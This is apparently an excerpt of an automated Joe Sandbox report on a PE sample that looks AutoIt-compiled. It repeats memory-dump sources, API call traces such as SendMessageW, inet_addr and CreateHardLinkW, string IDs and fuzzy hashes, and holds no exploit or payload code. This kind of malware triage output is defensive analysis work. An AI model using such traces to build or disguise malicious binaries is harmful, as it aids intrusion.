                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID: SysTreeView32
                                              • API String ID: 847901565-1698111956
                                              • Opcode ID: a3f5c350bf3f1dfcc55a46c7eafacd0621968ec71677771acebe18e41c645522
                                              • Instruction ID: c0778ae5aed117eddc54bce4f487d6a596ed68914ba3983fc7ebb68c2765c7e7
                                              • Opcode Fuzzy Hash: a3f5c350bf3f1dfcc55a46c7eafacd0621968ec71677771acebe18e41c645522
                                              • Instruction Fuzzy Hash: CE31BEB1200205AFDF219F78DC45BEA7BA9EB08338F205315FA79A21D0D771EC909760
                                              APIs
                                                • Part of subcall function 00DF335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00DF3077,?,?), ref: 00DF3378
                                              • inet_addr.WS2_32(?), ref: 00DF307A
                                              • _wcslen.LIBCMT ref: 00DF309B
                                              • htons.WS2_32(00000000), ref: 00DF3106
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                              • String ID: 255.255.255.255
                                              • API String ID: 946324512-2422070025
                                              • Opcode ID: 68b5d865669eca64067e067221555903b8010cfcd9b54bfe1398ad9928f428c4
                                              • Instruction ID: bea8db0c56ed2a581259018e6ecea001bb629eb9c60464bd9b0b2aead0aec86c
                                              • Opcode Fuzzy Hash: 68b5d865669eca64067e067221555903b8010cfcd9b54bfe1398ad9928f428c4
                                              • Instruction Fuzzy Hash: 0231A1356002099FCB10CF68C485E7A77E0EF54358F2AC059EA158B392DB72EE45C771
                                              APIs
                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E04705
                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E04713
                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E0471A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyWindow
                                              • String ID: msctls_updown32
                                              • API String ID: 4014797782-2298589950
                                              • Opcode ID: 9be9f3c5f78a7675f6ecf10fd568b76740139e29201885b51bfd6db030b4db6e
                                              • Instruction ID: 9003922e39e1373bee823094f6a0a2fd16e0c82aee64eb62e27b4babceb23fd2
                                              • Opcode Fuzzy Hash: 9be9f3c5f78a7675f6ecf10fd568b76740139e29201885b51bfd6db030b4db6e
                                              • Instruction Fuzzy Hash: 852181F5600209AFDB10DF68DD91DA737ADEF9A358B041049F600A72A1DB71EC91CA70
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                              • API String ID: 176396367-2734436370
                                              • Opcode ID: 99c81fcf2a76b25d3e4ef951d6392bec5ed3fcb6431532981c849e8babfff86f
                                              • Instruction ID: 299014e1bae53b3164460c929cc915466821e7c03a8983d485557286468557bf
                                              • Opcode Fuzzy Hash: 99c81fcf2a76b25d3e4ef951d6392bec5ed3fcb6431532981c849e8babfff86f
                                              • Instruction Fuzzy Hash: FA21383220425166C731BB249C22FBBF398DF51710F184437F94997285EB56ED92C3B5
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E03840
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E03850
                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E03876
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: 4ce222513808466bc14ee9e0c5e7c29fc506c781124fb3be0bb57001a83669c9
                                              • Instruction ID: a860233e8b4ccff0529386b9d50ee866ea43538fd323a7ed1410828f6ed4ef19
                                              • Opcode Fuzzy Hash: 4ce222513808466bc14ee9e0c5e7c29fc506c781124fb3be0bb57001a83669c9
                                              • Instruction Fuzzy Hash: 5C21DE72600218BFEF218F65CC81EAB376EEF89754F109125F944AB1D0CA72DC9287A0
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00DE4A08
                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00DE4A5C
                                              • SetErrorMode.KERNEL32(00000000,?,?,00E0CC08), ref: 00DE4AD0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorMode$InformationVolume
                                              • String ID: %lu
                                              • API String ID: 2507767853-685833217
                                              • Opcode ID: 8dd82b97ee4bd6d8e431668906f8f4da767f360ff012710263a8e040bcf93652
                                              • Instruction ID: fe454761d0f91dcabbafa25973a397ec7953d06cf720b65b400c348cf94f8a80
                                              • Opcode Fuzzy Hash: 8dd82b97ee4bd6d8e431668906f8f4da767f360ff012710263a8e040bcf93652
                                              • Instruction Fuzzy Hash: 86315375A00109AFDB10DF55C985EAABBF8EF08318F1480A5F509EB252D771ED45CB71
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E0424F
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E04264
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E04271
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: ec0073170520f4eba235556bad8b006d5bc6b6d8167e99021b73c80a95334755
                                              • Instruction ID: 88543b3bf01b5f9afd5948c067ef6d8f63c3d4f9743dc5980743b2bc6eaf11b1
                                              • Opcode Fuzzy Hash: ec0073170520f4eba235556bad8b006d5bc6b6d8167e99021b73c80a95334755
                                              • Instruction Fuzzy Hash: 9E11A3B1340248BEEF205F69CC06FAB3BACEF95B58F111518FA55F60E0D671D8A19B20
                                              APIs
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                                • Part of subcall function 00DD2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DD2DC5
                                                • Part of subcall function 00DD2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD2DD6
                                                • Part of subcall function 00DD2DA7: GetCurrentThreadId.KERNEL32 ref: 00DD2DDD
                                                • Part of subcall function 00DD2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DD2DE4
                                              • GetFocus.USER32 ref: 00DD2F78
                                                • Part of subcall function 00DD2DEE: GetParent.USER32(00000000), ref: 00DD2DF9
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00DD2FC3
                                              • EnumChildWindows.USER32(?,00DD303B), ref: 00DD2FEB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                              • String ID: %s%d
                                              • API String ID: 1272988791-1110647743
                                              • Opcode ID: ca1251244f0d00a16864a5bc2dcd564f0a4ec1884fa6138f328a4e7211c012fe
                                              • Instruction ID: cb68c1518a8f41171e7da23e222cbdc3efa276fc8e9a3b32cecef395c3ebb089
                                              • Opcode Fuzzy Hash: ca1251244f0d00a16864a5bc2dcd564f0a4ec1884fa6138f328a4e7211c012fe
                                              • Instruction Fuzzy Hash: E511E4712002056BCF247F709C86EFD376AEFA4304F148076F909AB292EE319A49CB70
                                              APIs
                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E058C1
                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E058EE
                                              • DrawMenuBar.USER32(?), ref: 00E058FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Menu$InfoItem$Draw
                                              • String ID: 0
                                              • API String ID: 3227129158-4108050209
                                              • Opcode ID: 8023c3d550df477f8606c17440dccd1260b629622cece64005bae184fd4109b9
                                              • Instruction ID: 4f722820af6a7c6d91536fa6f656b5ca7bab9270699fa0a8d9a7a7679ec33a57
                                              • Opcode Fuzzy Hash: 8023c3d550df477f8606c17440dccd1260b629622cece64005bae184fd4109b9
                                              • Instruction Fuzzy Hash: A2013536500218EEDB219F51DC44BABBBB4FB85365F1080A9E859E6191DB308AD4EF31
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9937649dd65c5e7e07bc2ca43804987a5f616458977048fa195fa7edd1e63b49
                                              • Instruction ID: 54f604a50c128869272fb731f8cb069d1eb25ac76549ce8d382332ca54d1de77
                                              • Opcode Fuzzy Hash: 9937649dd65c5e7e07bc2ca43804987a5f616458977048fa195fa7edd1e63b49
                                              • Instruction Fuzzy Hash: F5C12A75A00206AFDB14CFA8C894BAEBBB5FF88704F248599E505EB251D731DE41CBA4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInitInitializeUninitialize
                                              • String ID:
                                              • API String ID: 1998397398-0
                                              • Opcode ID: 2d3b19e487fdd0224097c220fc1a69f88dc2f9aeac90ad78e1687be6dcae84bc
                                              • Instruction ID: c1e41ec9c78bec429dd744c7df617a496e39d11593ab9b022492f3d038fd2a7f
                                              • Opcode Fuzzy Hash: 2d3b19e487fdd0224097c220fc1a69f88dc2f9aeac90ad78e1687be6dcae84bc
                                              • Instruction Fuzzy Hash: D4A11B756042049FC710EF28C485A2AB7E5FF88714F16C959F9899B362DB30EE45CBB1
                                              APIs
                                              • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DD05F0
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00DD0608
                                              • CLSIDFromProgID.COMBASE(?,?), ref: 00DD062D
                                              • _memcmp.LIBVCRUNTIME ref: 00DD064E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: 9f639561828615333cd1c4bf284bbfdb865e49a0f413c4ccd4678f647d168766
                                              • Instruction ID: 82a7010ea35f44a51ca74c5a55d912509631d6e23eaf7438e6fafd5bf8108107
                                              • Opcode Fuzzy Hash: 9f639561828615333cd1c4bf284bbfdb865e49a0f413c4ccd4678f647d168766
                                              • Instruction Fuzzy Hash: 5A811B71A00109EFCB04DF94C984EEEBBB9FF89315F244599E506AB250DB71AE46CF60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: 989f9017cdf11c90bc0a99fb6329608d62f6917f71bd171a7d6ea34c92dc3cd0
                                              • Instruction ID: 9c95df781ba9c60e93f20fa1d46b7b43211ce338b526dc8558ffae89722aaa8b
                                              • Opcode Fuzzy Hash: 989f9017cdf11c90bc0a99fb6329608d62f6917f71bd171a7d6ea34c92dc3cd0
                                              • Instruction Fuzzy Hash: 8B417D39A00210EBDF217BFD9C56BFE3AE4EF46770F684225F41AD3192EA7489415272
                                              APIs
                                              • GetWindowRect.USER32(00FD0A50,?), ref: 00E062E2
                                              • ScreenToClient.USER32(?,?), ref: 00E06315
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00E06382
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID:
                                              • API String ID: 3880355969-0
                                              • Opcode ID: f6106702e98f9ef7ab2293fde97fd00f47635314c6adbd6cc3db59055adee3d9
                                              • Instruction ID: afdb694d677cc4b45e2912760ea19469a3d7b1619b32620a158e0ba9c54fcf4d
                                              • Opcode Fuzzy Hash: f6106702e98f9ef7ab2293fde97fd00f47635314c6adbd6cc3db59055adee3d9
                                              • Instruction Fuzzy Hash: 20514D74900209EFDF20DF68D880AAE7BB5FB95364F109259F915AB2E0D734ED91CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 477b7990f189161dafc9ec21cdf157a0eefa357850c911702b88953b16b30f06
                                              • Instruction ID: 604279da94cdc24037814d3e1532c8dc94ed50b3482241176a6e39e5633b037e
                                              • Opcode Fuzzy Hash: 477b7990f189161dafc9ec21cdf157a0eefa357850c911702b88953b16b30f06
                                              • Instruction Fuzzy Hash: 1D41E875A00704AFD7249F78CC41BAABBE9EB89724F10452FF551DB282D7B1E94287B0
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DE5783
                                              • GetLastError.KERNEL32(?,00000000), ref: 00DE57A9
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DE57CE
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DE57FA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: e3008bc26a7a0312fab0b5c74513b1a1f43b5ce99cb443ead711160ffe990a47
                                              • Instruction ID: 6b03a303237c8614bd819d6899a827bbd0bff393d444084919636c134197fe44
                                              • Opcode Fuzzy Hash: e3008bc26a7a0312fab0b5c74513b1a1f43b5ce99cb443ead711160ffe990a47
                                              • Instruction Fuzzy Hash: 58411E35600610DFCB11EF15C584A5DBBE2EF89724B19C889E84A6B362DB35FD41CBB1
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00D96D71,00000000,00000000,00D982D9,?,00D982D9,?,00000001,00D96D71,8BE85006,00000001,00D982D9,00D982D9), ref: 00DAD910
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DAD999
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00DAD9AB
                                              • __freea.LIBCMT ref: 00DAD9B4
                                                • Part of subcall function 00DA3820: RtlAllocateHeap.NTDLL(00000000,?,00E41444), ref: 00DA3852
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
